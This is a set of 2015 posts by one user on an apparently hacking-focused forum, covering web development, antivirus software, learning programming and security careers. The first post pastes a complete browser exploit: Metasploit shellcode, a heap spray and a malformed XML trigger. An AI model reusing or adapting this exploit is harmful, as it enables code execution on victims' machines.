Messages - DoctorT

1
General discussion / Re: Front end and back end
« on: October 13, 2015, 06:28:50 PM »
@Code.Illusionist Don't listen to him. He is saying network hacker and javascript/html/css in the same sentence. He gonna hack your network with javascript and css. He has mastered C++ templates from the boost lib. He is coding the website's main backend using C++ [which is ok] but doesn't want to know about html, I wonder how he will present the results of all that processing with his C++ templates to the world. SERIOUS DoctorT.

My say is the same people should do this or have a good communication link between the two teams or we are going to have a shitty product out there since these people don't communicate. Again @OP, be happy and celebrate you have the opportunity you have here, unless you are not motivated to learn.

I admit I wasn't clear (a little rushed while making my reply) last time, but I never said I could "hack into (someone's) network using JS/CSS." I am not shitting you, but you can do stuff with Javascript... Here is an exploit I copy-pasted from Stackoverflow's thread about it.

Code:
<html>
    <div id="replace">x</div>
    <script>
        // windows/exec - 148 bytes
        // http://www.metasploit.com
        // Encoder: x86/shikata_ga_nai
        // EXITFUNC=process, CMD=calc.exe
        var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

        // ugly heap spray, the d0nkey way!
        // works most of the time
        var spray = unescape("%u0a0a%u0a0a");

        do {
           spray += spray;
        } while(spray.length < 0xd0000);

        memory = new Array();

        for(i = 0; i < 100; i++)
           memory[i] = spray + shellcode;

        xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";

        tag = document.getElementById("replace");
        tag.innerHTML = xmlcode;

    </script>
</html>

Obviously this exploits some XML parsing bug which is out of the scope of this thread. I am just saying, to be a computer scientist (actual engineer), you need to know shit about your field while also being decent at maths, physics, chemistry and biology where all except maths are irrelevant in your field. Because when you call yourself a programmer, you must be able to code Javascript (can you code a forum software, an actual, functioning software which is the bread and butter of companies like Invision, Internet Brands and then-Jelsoft?, without using Jquery/Javascript? You must be bullshitting) and stuff like that. But I wouldn't work for a company that tells me to create a debugger, then design (color, move stuff, create categories, etc.) for its promotional website. Fuck that.

2
I'm rather sure I've read it.. but I'd have to go look through my collection to see if I have it and then refresh my memory to be sure. That said I'm a HUGE advocate for reading about old exploits/hacks. Sure many times that "old" hack is so outdated that it will never ever be used again as is, but a well written book or article won't just give exact details for an exploit, but the methodology behind it. Methodology is imo one of the most useful things you CAN learn. The more methods at your disposal, the more "thought patterns" the more exploits you are capable of seeing.

I'm going to tell a story here :). It is not computer related, but it is hacking related.

So a buddy of mine I played pool with (billiards) taught me an interesting game some time back. Basically set up for a normal game of 8 ball, break like normal. But after that you use object balls (such as the 7 ball) as your cue ball that MUST hit the cue ball as your object ball before going in a pocket. Meaning you would hit the 7 at the cue ball that MUST strike it, THEN the 7 is allowed to be pocketed. What this does is opens your mind to all sorts of combinations and angles that you would normally not see. Now before I learned this game I was a rather decent player, capable of holding off a barroom full of people for hours on a table. Meaning I was by no means a shabby player. I know "shapes", have good cue control, can hit bank shots/cuts etc. Yet learning this alternate style game GREATLY improved how I viewed object balls on the table. In other words the "style" of play itself is the hack, greatly changing how the game is played/viewed.

Many times an exploit is discovered, someone familiar with old methodologies can see where it tied in for that hack, or in the case of someone finding a discovery many times it will be based off of the methodologies they applied. Basically those shots/hacks were already there, you simply lacked the framework or proper mindset to apply to see them. Learning old HAM radio techniques/phreaking/etc are still just as useful now as they were then, even if the original hack can't be applied, the methodology can.

That's very true my friend.

You know, learning physics, chemistry, biology and mathematics (well, perhaps excluding mathematics which is very important in computer science) will not affect your hacking skills, because for fuck's sake, someone could be an utter idiot incapable of telling the difference between the central nervous system and the sun, yet for some reason able to hack into a digital billboard and display porn (as some hackers did a while ago in Brazil, for reasons nobody will understand, except the band of brothers.) But you know, understanding the anatomy of a centipede (not the nicest creature to look at, but since I have the fear of spiders, I think it's beneficial but scary-as-fuck to perform a surgery at a sun spider.)

You know, being able to think like a chemist will free your mind from "it's just computers." You know, the table Mendeleev created, that had 63 elements, he even predicted some elements that were not discovered. That was quite unlike Newlands, who thought only some elements existed. You know, when I think about it, Newlands, if he existed in the 21st century, wouldn't have been a mediocre hacker even if he wanted to. He thought the primitive chemistry at his time was "be all end all."

He, unlike Mendeleev, thought that there couldn't be any more compounds than those which were discovered in his lifetime. Furthermore as atomic number wasn't discovered (or perhaps, "used" would be more correct) in his lifetime, his system of octaves failed after Ca. Although his failure gave rise to Mendeleev's Periodic Table, which had its own faults (hydrogen in halogen, and isotopes...), but at least he was able to predict Germanium, Scandium and a few others. He knew that there will be several more elements discovered.

From a modern hacker's point-of-view, thinking about it, you are trained to know that exploits can be discovered in every new version of any software. So even if possibly all exploits able to be exploited in any specific environment are discovered, the patches themselves can introduce new exploits. Or new features, optimizations and so-on further modifications in the code.

Just think about it, mathematically, a computer may never be as smart as Einstein, or a groundbreaking future physicist that's sucking a plastic nipple right now, but when its programmer knows what Einstein knew at his time combined with the mathematical capabilities of a chemist and open-mindedness of a biologist, biochemist, it will sure create some respect for its programmer in the world of science, where computer science isn't as much appreciated as the E = mc² formula.

3
General discussion / Re: Front end and back end
« on: October 11, 2015, 04:39:37 PM »
To be honest, although I have never worked as a programmer (but from what I understand from programming blogs), I do think it's strange to develop a web application from scratch over a self-hosted server, and then do the web application's promotional website's HTML/CSS by yourself. Like, really, do you really fucking care about HTML anymore after you have mastered C++ templates from BOOST lib? Like, seriously... I understand to be a network hacker you must know some stuff like Javascript/HTML/CSS (the noob stuff) aside from knowing sophisticated stuff like shell socket programming/DNS poisoning etc. But seriously, I wouldn't want to work at a company that'd make me color their website after I just write ten thousand lines of code in five days for their backend stuff.

4
General discussion / Re: Best os for someone new to Linux?
« on: October 11, 2015, 04:35:19 PM »
I suggest Linux Mint (but to be honest the only other Linux distribution I have used is Ubuntu which was better than Windows technical-wise but I still use Windows 8.1.) But honestly, it's like asking where to go for a free medical checkup hosted at multiple clinics by the hospital staff. Some may be better than the other, but you are sure you won't get any serious casualties and it doesn't cost anything other than the time to reach the clinic.

5
High Quality Tutorials / Re: SQL Injection
« on: October 08, 2015, 05:26:29 PM »
That's a lot of writing. I like writing, especially of computer science. But even for me, writing a topic about damned SQLis is difficult with the thread start explaining what PHP really is and containing a MySQL table right after it. That's some really cool stuff here in this forum.

Thank you, bookmarked (even though, thanks to your ebook section, I have 200 ebooks about hacking.) You deserve a cookie.

6
General discussion / Re: Free Softwares stealing our datas
« on: October 08, 2015, 07:37:20 AM »
I admit that the largest software companies like Microsoft will sell your data even if you pay for their software. But that doesn't make open-source software bad, especially every single software. For example, I don't think MyBB would sell your data to anyone, and there are some privacy policies of open-source software that simply read "We will never sell your data without your permission."

I also love how Java has "sponsored" software pre-checked. They really hope we just click "next next next" without noticing.

7
General discussion / Re: Free Softwares stealing our datas
« on: October 06, 2015, 06:25:13 PM »
Others have smugly questioned why anyone could possibly still be using AVG when there's other, newer, more highly regarded free software on the market such as Panda, Bitdefender or Malwarebytes.

Malwarebytes isn't even an antivirus.... it is an anti-malware. I think everyone over this forum should know the difference between an antivirus and anti-malware which is conceptual programming equal to primary school "science." AVG is the fence and Malwarebytes is the steel door that comes free with a large police dog. (Or just the large dog if you don't pirate the license.)

Panda, I thought, is dead. Who cares about it anymore?

Bitdefender "free" is DEAD just like Panda. It doesn't include official support anymore.

I am not advocating AVG (but I admit I have it installed in my system at the moment of typing this, why? Because I didn't have enough time to download ESET after a fresh OS reinstall and I couldn't keep my system unprotected for long. It is AVG Internet Security but I didn't pay for it.) I am just saying that the article itself has some points that deserve to be mocked.

8
General discussion / Re: Mental illness?
« on: October 06, 2015, 06:17:21 PM »
Self-treating OCD and a slowly fading social anxiety that almost evolved into an AvPD (avoidant personality disorder.) Man, fuck being stressed. You know, I am just fifteen yet my beard has some grey hair on it. Let alone of the scalp hair. I've been exercising very hard to reduce stress, just burst one of my blood vessels (two I think actually) last night. My arms are also full of white stretch marks. You know, all because I was mocked at school at the early grades.

9
Why not? Hackers (sometimes) get hired by companies for their skill to find bugs in their software, which means that he understands them and can fix them, even more he can make protections against it. But ofc there are those that throw those people in jail and claim the company found the bug.
Of course companies hire security professionals. But as Gray Hat Hacking puts it, we currently have no legal backing. But if Valve could put a guy in jail that had simply accessed the source code of Half-Life 2, and had FBI/CIA support (and the whole "I'll interview ya" was FBI's idea) and couldn't get the slightest black mark in the hacking community, how can you expect for Bethesda or Blizzard to not perform such action? Likewise, most managers don't know crap about things they manage. Let alone complicated C# buffer overflow exploit to be understood by them.

10
Deque has pointed out that wording can make a huge difference. Password brute-force simply sounds evil to non-programmer management teams. While "recovery" can have different part of brain activated. Even so, I do not think I would include malware in any portfolio, because honestly, do you think those guys at Blizzard will hire me if they know WoW could be potentially hacked by me? Or, like the guy who was promised the cake at Valve (yes, "the cake is a lie" reference) and then instead swatted by Gab because the source code of HL2 was simply accessed by him.... you know, if this hacker had just shut his mouth and didn't get lucrated to a job in Valve, he wouldn't have faced custody. Do you think the makers of WoW, or even Elder Scrolls Online, would even be slightly pleased to have an active exploit in their game included in the job application by someone that wants to be their employee?

11
General discussion / Re: Easiest programming/scripting language
« on: September 22, 2015, 06:33:15 PM »
In truth, Ruby is simpler than Python but it is server-side. Think of it as web-hacking. But I do not fancy web-hacking (you know, SQL just makes no sense to someone that is so obsessed with C/C#, and I am not even talking about C++, where the most complex of templates are replaced with "where ABCD* do XYDZ".) There is a rule of thumb for learning mathematics.

If you learn the most complex theorems and algorithms and corollaries that do not depend upon all but the simplest theorems, and you can calculate the spherical front fact of a pyramid in a few seconds, you'll get 97% in algebra/calculus undergrad courses without even reading the textbooks. Why, because when the teacher is teaching the most basic stuff, you already have trained your brain to be equivalent of the professor, and one-time revision in the class room is enough to get you A++. Because you don't need to be taught Pythagoras' theorem when you already know Fermat's Last Theorem, which was unsolved for three and a half centuries. Pythagoras is AB + BC = AC (in its simplest form), which is not too hard for you.

Similar is the case for programming. If you start with C (which is, trust me, still one of the most simple programming languages despite it being the father of C++), you'll be like "holy shit, how easy it is in Python!" instead of the vice versa and have Python as first language and say, "HOLY SHIT!!!! So this was the underlying fundamental layer under my simple Python command."

For your required goals, I suggest a multitude of languages.
Obviously C, some C++, C# (managed memory, wheeeeeeeewwwww, thread safety, libraries, whewwwwwww) and Python. Learn in that order, or learn C# before C++.

12
As theWormKill already mentioned, you need to know the language you are going to RE itself. For example, (I have, too, not yet read this book but I assume it teaches IDA and little of RE itself) if you want to reverse-engineer a file on an "x86 IBM PC", you'd need to learn http://www.ibm.com/developerworks/library/l-ia/it.

As for the skills you actually need to learn Assembly (any type), would be....
  • A pretty good brain that should know some subjects like chemistry, physics, etc. but a lot of fourteen year olds can do it, so can you, without a lot of academic qualification.
  • Enthusiasm in computer science. Intermediate (preferably advanced) knowledge in C programming. But you know, the C code printf function changes to
                         global start
    start                            proc near
    jmp near ptr 0x444
    (valid Assembly code but I have no idea what it does) so even an advanced C programmer may have trouble writing small Assembly programs.
There is an old joke in computer programming, "Why did the chicken cross the road," where the Assembly programmer says the chicken had to build the road before crossing it. There is also a "finding the elephant" joke over Stackoverflow where the "Assembly programmer gets on his knees, and searches the entire African continent for an elephant." In the "How to kill a dragon with a programming language," "the Assembly programmer builds his mighty sword with tens of thousands of needles."

Imagine reversing the code of a script kiddy who wrote his keylogger in Python. In Assembly. There comes a lot of obfuscation. And coffee.

13
News and Announcements / Re: Board restrictions to new members
« on: September 22, 2015, 05:13:35 PM »
There are enough valuable non-tech related topics everyone can participate in without spamming random shit. It's quite easy to get above 20 posts this way and the effort involved won't hurt anybody.
I think this is a good step.
"We've enough leechers..."
Like most people out here just for the ebooks section, I was pretty disappointed actually. I am usually a HQ poster (that being said, I actually have cut myself from my tiny little fanbase over the internet, and I never have been called a script kiddy, because I do not try to impress people with the humble knowledge of mine) and I was going to post only six-seven months later when the board exams would be over.

Regardless, I hope I am welcomed.
